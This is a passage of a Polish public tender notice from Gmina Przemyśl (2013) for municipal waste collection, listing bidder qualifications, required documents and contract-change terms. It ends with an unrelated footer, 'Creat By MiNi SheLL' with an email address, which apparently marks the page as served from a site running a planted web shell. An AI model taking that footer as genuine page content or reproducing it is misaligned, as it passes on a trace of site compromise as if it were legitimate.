Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia warunku: Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada:
1) wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska;
2) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie gminy Przemyśl.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia warunku: Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje, co najmniej 1 usługę odbierania odpadów komunalnych z terenu nieruchomości w sposób ciągły przez okres minimum 12 miesięcy                     o  wartości 500 000,00 PLN, w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia warunku: Zamawiający uzna powyższy warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje/posiada niezbędne do wykonania zamówienia narzędzia i urządzenia tj;
3.1 pojazdy:
a) co najmniej dwoma samochodami specjalistycznymi bezpylnymi o minimalnej kubaturze 3 m 3 przystosowanymi do odbierania zmieszanych odpadów komunalnych,
b) co najmniej dwa samochodami  specjalistycznymi bezpylnymi przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych,
c) co najmniej jednym pojazdem o ładowności minimalnej 3,5 Mg do odbierania odpadów bez funkcji kompaktującej,
d) co najmniej jednym pojazdem małogabarytowym  przystosowanym do odbierania odpadów komunalnych zmieszanych i zebranych selektywnie z nieruchomości o utrudnionym dojeździe tj. wąskie drogi, drogi o nawierzchni gruntowej i inne miejsca, do których dojazd może stanowić problem dla typowego pojazdu odbierającego odpady,	
e) co najmniej 1 pojazdem specjalistycznym wyposażonym w urządzenie z funkcją do mycia                 i dezynfekcji pojemników.

3.2 Odpowiednio  usytuowaną i wyposażoną  bazą magazynowo - transportową:
a) bazą magazynowo-transportową usytuowaną w gminie Przemyśl lub  w odległości nie większej niż 60 km od granicy gminy na terenie, do którego posiada lub będzie posiadał tytuł prawny,
b) teren bazy magazynowo-transportowej winien być zabezpieczony w sposób uniemożliwiający wstęp osobom trzecim,
c) miejsce do parkowania pojazdów winno być zabezpieczone przed emisją zanieczyszczeń do gruntu,
d) baza ta musi być wyposażona w urządzenia/miejsce  do gromadzenia selektywnie zebranych odpadów komunalnych przed transportem do miejsc przetwarzania,
e) teren bazy magazynowo-transportowej był wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie   z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 r. Prawo wodne.
f) baza magazynowo-transportowa musi być wyposażona w:
1) miejsce przeznaczone do parkowania pojazdów,
2) pomieszczenie socjalne dla pracowników,
3) miejsce do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych,
4) legalizowaną samochodową wagę najezdną -  w przypadku, gdy na terenie bazy następuje magazynowanie odpadów,
g) na terenie bazy magazynowo-terenowej powinny się znajdować także:
1) punkt bieżącej konserwacji i napraw pojazdów,
2) miejsce do mycia i dezynfekcji pojazdów
- o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia warunku: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, na potwierdzenie spełniania warunku Wykonawca  przedłoży oświadczenie 
o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z  art. 22 ust. 1,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia warunku: Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż  400 000,00 złotych. (Wykonawca powołujący się przy wykazywaniu spełnienia warunku udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada dokumenty dotyczące podmiotów zasobami, których będzie dysponował wykonawca).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy
pełnomocnictwo  do reprezentowania podmiotów występujących wspólnie lub do występowania wspólnie i zawarcia umowy w przypadku składania  oferty wspólnej  w oryginale
pełnomocnictwo dla osoby składającej ofertę w przypadku działania  wykonawcy przez pełnomocnika  pełnomocnictwo w oryginale.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.1. Zmiany podwykonawcy, który zgodnie  art. 26 ust. 2b ustawy Prawo zamówień publicznych będzie podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia. W takim przypadku Wykonawca będzie zobowiązany zaproponować innego podwykonawcę spełniającego na dzień składania ofert warunki określone przez Zamawiającego w SIWZ wraz z załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych w SIWZ.
2.2. Harmonogramu wywozu odpadów - dopuszczalna jest  z uwagi na:
a)  niekorzystne warunki atmosferyczne ( opady deszczu, przeszkody atmosferyczne o charakterze katastrof)  utrudniające wykonanie usługi, Warunkiem wprowadzenia zmiany harmonogramu jest wystąpienie okoliczności niezależnych od stron umowy, uniemożliwiających wykonanie umowy                  w terminie pierwotnym. Obowiązek udokumentowania wystąpienia okoliczności uzasadniającej zmianę harmonogramu ciąży na stronie umowy wnioskującej o wprowadzenie zmiany. Za okoliczności uniemożliwiające wykonanie przedmiotu umowy w terminie uznaje się w szczególności działanie siły wyższej, opóźnienia  nie leżące po stronie Wykonawcy. Zaistnienie siły wyższej powinno być udokumentowane przez Stronę powołującą się na nią,
b) wskutek zmiany częstotliwości wywozu odpadów komunalnych.
2.3. Zmiany zakresu usług, które Wykonawca powierzył podwykonawcom w złożonej ofercie Wykonawcy.
2.4.  Zmiany umowy na skutek zmiany formy organizacyjno-prawnej, przekształcenia  lub połączenia Wykonawcy.
2.5. Zmiany częstotliwości wywozu odpadów komunalnych z zachowaniem faktycznych odległości występujących na terenie gminy Przemyśl, które będą pokonywane przez Wykonawcę w celu realizacji zamówienia.
6.6. Zmiany danych teleadresowych lub numerów konta Zamawiającego lub Wykonawcy.
6.7. Zmiany w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona
 umowę osobiście w zakresie zgodnym z SIWZ oraz zmiany osobowej podwykonawców oraz zakresu podwykonawstwa w warunkach opisanych powyżej.
6.8. Zmiany wysokości wynagrodzenia Wykonawcy na skutek zmiany obowiązującej stawki podatku VAT.
6.9. Zmiany regionalnej instalacji zagospodarowania odpadów w przypadku uruchomienia Regionalnej Instalacji Zagospodarowania Odpadów Komunalnych w Przemyślu.
6.10. Zmiany częstotliwości wywozu odpadów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaprzemysl.home.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Przemysl, 37-700 Przemysl, ul. Borelowskiego 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2013 godzina 10:00, miejsce: Urząd Gminy Przemysl, 37-700 Przemysl, ul. Borelowskiego 1, Sekretariat, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com